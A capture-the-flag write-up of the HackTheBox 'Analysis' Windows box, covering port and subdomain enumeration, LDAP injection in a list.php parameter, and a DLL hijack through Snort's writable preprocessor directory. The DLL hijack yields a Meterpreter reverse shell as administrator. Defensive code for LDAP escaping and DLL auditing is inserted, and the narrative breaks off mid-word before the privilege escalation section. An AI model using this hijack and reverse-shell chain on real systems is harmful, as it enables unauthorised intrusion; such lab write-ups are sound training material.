# Analysis

## Enumeration

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ nmap -sC -sV -Pn 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 20:14 EST
Nmap scan report for analysis.htb (10.10.11.250)
Host is up (0.69s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-22 01:14:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -2s
| smb2-time: 
|   date: 2024-01-22T01:14:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.58 secon
```

DNS plus HTTP is a great combination for subdomain fuzzing.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ gobuster dns -d analysis.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     analysis.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/01/21 20:18:24 Starting gobuster in DNS enumeration mode
===============================================================
Found: internal.analysis.htb
```

Loading the site returns a 403 Forbidden. Time to brute force the directories and file paths.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ ffuf -u http://internal.analysis.htb/users/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://internal.analysis.htb/users/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 98ms]
    * FUZZ: list.php

[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 5ms]
    * FUZZ: List.php
```

Visiting `list.php` returns `missing parameter`, and supplying a valid name returns results!

<figure><img src="https://3153414035-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FR4a0fV7sSqa7aeUItg65%2Fuploads%2FbCGJZcqGgnXAyjtwdwvN%2Fimage.png?alt=media&#x26;token=7c695db7-6167-454a-b185-71da6cba1086" alt=""><figcaption><p>LDAP injection</p></figcaption></figure>

Judging from these columns, the `name` parameter appears to be susceptible to LDAP injection.
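To make the defect concrete, here is an added illustration (not the box's `list.php`, whose query is never shown on the page): the concatenation pattern that makes a `name` parameter injectable next to the RFC 4515 escaped form, plus a small helper that picks injection-like `name` values out of access-log lines. The filter template and the log lines are assumptions constructed for the example.

```python
"""LDAP filter escaping: the concatenation pattern that makes a `name`
parameter injectable, beside the RFC 4515 escaped form, plus a helper
for picking injection-like values out of web access logs.

Added illustration for this writeup. The filter template and the log
lines are assumptions: the page does not show list.php's actual query.
"""
import re
from urllib.parse import parse_qs, urlsplit

# RFC 4515 section 3: these characters must be hex-escaped inside an assertion value.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# Assumed template; the real list.php filter is not shown on the page.
TEMPLATE = "(&(objectClass=user)(sAMAccountName={name}))"


def escape_ldap_filter_value(value: str) -> str:
    """Escape a string for use as a single assertion value in an LDAP filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str) -> str:
    """Vulnerable pattern: user input pasted straight into the filter."""
    return TEMPLATE.format(name=name)


def build_filter_safe(name: str) -> str:
    """Hardened pattern: the same template, input escaped first."""
    return TEMPLATE.format(name=escape_ldap_filter_value(name))


def suspicious_name_values(log_lines):
    """Return (line_no, decoded value) for requests whose `name` query
    parameter contains LDAP filter metacharacters once URL-decoded."""
    meta = set(_ESCAPES)
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = re.search(r"GET (\S+)", line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get("name", []):
            if meta & set(value):
                hits.append((line_no, value))
    return hits


# Constructed access-log excerpt (not from the box); `%2a` decodes to `*`.
SAMPLE_LOG = [
    "GET /users/list.php?name=technician 200",
    "GET /users/list.php?name=%2a 200",
    "GET /users/list.php 200",
]

if __name__ == "__main__":
    for name in ("technician", "tech*"):
        print("unsafe:", build_filter_unsafe(name))
        print("safe:  ", build_filter_safe(name))
    print("flagged:", suspicious_name_values(SAMPLE_LOG))
```

The escaped form keeps `*` and parentheses as literal bytes of the assertion value, so a wildcard or an extra filter clause in `name` no longer changes the query's shape; the log helper is the cheap server-side check for the same metacharacters.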

After a long while, I disc

## Privilege Escalation (Unintended)

We can perform a DLL hijacking based on having write-permissions in the `C:\Snort\lib\snort_dynamicpreprocessor` directory.

According to `snort.conf`, located in `C:\Snort\etc\`, the dynamic modules are defined as follows:

```bash
###################################################
# Step #4: Configure dynamic loaded libraries.  
# For more information, see Snort Manual, Configuring Snort - Dynamic Modules
###################################################

# path to dynamic preprocessor libraries
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor

# path to base preprocessor engine
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll

# path to dynamic rules libraries
# dynamicdetection directory C:\Snort\lib\snort_dynamicrules
```

We can tell that Snort is being restarted at intervals, since the Snort log keeps getting updated.

Therefore, we can drop our malicious DLL, named `sf_engine.dll`, into the `C:\Snort\lib\snort_dynamicpreprocessor` directory, since Snort loads every DLL found there.

After uploading our malicious DLL to the directory and running Snort with the config file listed above, we see that our DLL is actually loaded, but sadly no shell comes back.
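From the defender's side, the weakness is the combination of a load directory Snort trusts wholesale and write access to it for a non-privileged user. The following added example (not Snort's own tooling, and not from the original writeup) parses the `dynamic*` directives quoted above and compares the preprocessor directory's contents with a baseline. The baseline is an assumption: it holds only the three libraries visible in the load output on this page, where a real one would come from a known-good install.

```python
"""Audit of the DLL locations a Snort 2 configuration will load from.

Added illustration for this writeup, not Snort's own tooling. It parses
the dynamic* directives quoted above, then compares the contents of the
preprocessor directory with a baseline. The baseline below is partial,
built only from the three libraries visible in the load output above;
a real one comes from a known-good install.
"""
import os
import re
from pathlib import PureWindowsPath

# The directives quoted from C:\Snort\etc\snort.conf on the page.
SNORT_CONF = r"""
# path to dynamic preprocessor libraries
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor

# path to base preprocessor engine
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll

# path to dynamic rules libraries
# dynamicdetection directory C:\Snort\lib\snort_dynamicrules
"""

# Partial baseline (assumption): the preprocessor DLLs visible in the load output.
EXPECTED_PREPROCESSORS = {"sf_dce2.dll", "sf_dnp3.dll", "sf_dns.dll"}

_DIRECTIVE = re.compile(
    r"(dynamicengine|dynamicpreprocessor|dynamicdetection)\s+"
    r"(?:(?:directory|file)\s+)?(.+)"
)


def parse_dynamic_paths(conf_text):
    """Return the active (uncommented) dynamic* directives keyed by name."""
    found = {"dynamicengine": [], "dynamicpreprocessor": [], "dynamicdetection": []}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # the commented-out dynamicdetection line is skipped
        m = _DIRECTIVE.match(line)
        if m:
            found[m.group(1)].append(m.group(2).strip())
    return found


def audit_preprocessor_dir(listing, engine_path, expected):
    """Flag DLLs in the preprocessor directory that are not in the baseline.
    A file carrying the engine DLL's name is reported separately: the engine
    belongs in snort_dynamicengine, and Snort loads every DLL in the
    preprocessor directory regardless of its name."""
    engine_name = PureWindowsPath(engine_path).name.lower()
    findings = []
    for name in listing:
        low = name.lower()
        if not low.endswith(".dll"):
            continue
        if low == engine_name:
            findings.append((name, "engine DLL name inside preprocessor directory"))
        elif low not in expected:
            findings.append((name, "not in baseline"))
    return findings


def audit_on_disk(conf_path):
    """Run the audit against a live install; only meaningful on the Snort host."""
    with open(conf_path, encoding="utf-8", errors="replace") as fh:
        paths = parse_dynamic_paths(fh.read())
    report = {}
    for directory in paths["dynamicpreprocessor"]:
        listing = os.listdir(directory) if os.path.isdir(directory) else []
        report[directory] = audit_preprocessor_dir(
            listing, paths["dynamicengine"][0], EXPECTED_PREPROCESSORS)
    return report


if __name__ == "__main__":
    paths = parse_dynamic_paths(SNORT_CONF)
    # Constructed directory listing mirroring the state described above.
    listing = ["sf_dce2.dll", "sf_dnp3.dll", "sf_dns.dll", "sf_engine.dll"]
    for finding in audit_preprocessor_dir(listing, paths["dynamicengine"][0],
                                          EXPECTED_PREPROCESSORS):
        print(finding)
```

On the host itself, pair this with `icacls` on each directory the parser reports, to confirm that only administrators hold write access; an unexpected DLL in the listing, or a write ACE for an ordinary user, is the condition the walkthrough above relies on.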

{% code overflow="wrap" %}

```bash
Evil-WinRM* PS C:\Snort\bin> ./snort.exe -c C:\Snort\etc\snort.conf
snort.exe : Running in IDS mode
    + CategoryInfo          : NotSpecified: (Running in IDS mode:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
        --== Initializing Snort ==--Initializing Output Plugins!Initializing Preprocessors!Initializing Plug-ins!Parsing Rules file "C:\Snort\etc\snort.conf"PortVar 'HTTP_PORTS' defined :  [ 80:81 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'SHELLCODE_PORTS' defined :  [ 0:79 81:65535 ]PortVar 'ORACLE_PORTS' defined :  [ 1024:65535 ]PortVar 'SSH_PORTS' defined :  [ 22 ]PortVar 'FTP_PORTS' defined :  [ 21 2100 3535 ]PortVar 'SIP_PORTS' defined :  [ 5060:5061 5600 ]PortVar 'FILE_DATA_PORTS' defined :  [ 80:81 110 143 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'GTP_PORTS' defined :  [ 2123 2152 3386 ]Detection:   Search-Method = AC-Full-Q    Split Any/Any group = enabled    Search-Method-Optimizations = enabled    Maximum pattern length = 20Tagged Packet Limit: 256Loading dynamic engine C:\Snort\lib\snort_dynamicengine\sf_engine.dll... doneLoading all dynamic preprocessor libs from C:\Snort\lib\snort_dynamicpreprocessor...  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dce2.dll... done  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dnp3.dll... done  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dns.dll... done  Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll...
```

{% endcode %}

However, after a while, my Meterpreter listener manages to catch a privileged shell, presumably from the Administrator running the batch script to restart Snort.

```bash
View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.36:4444 
[*] Sending stage (200774 bytes) to 10.10.11.250
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.11.250:65304) at 2024-01-21 19:59:11 -0500

meterpreter > shell
Process 15708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
analysis\administrateur
```
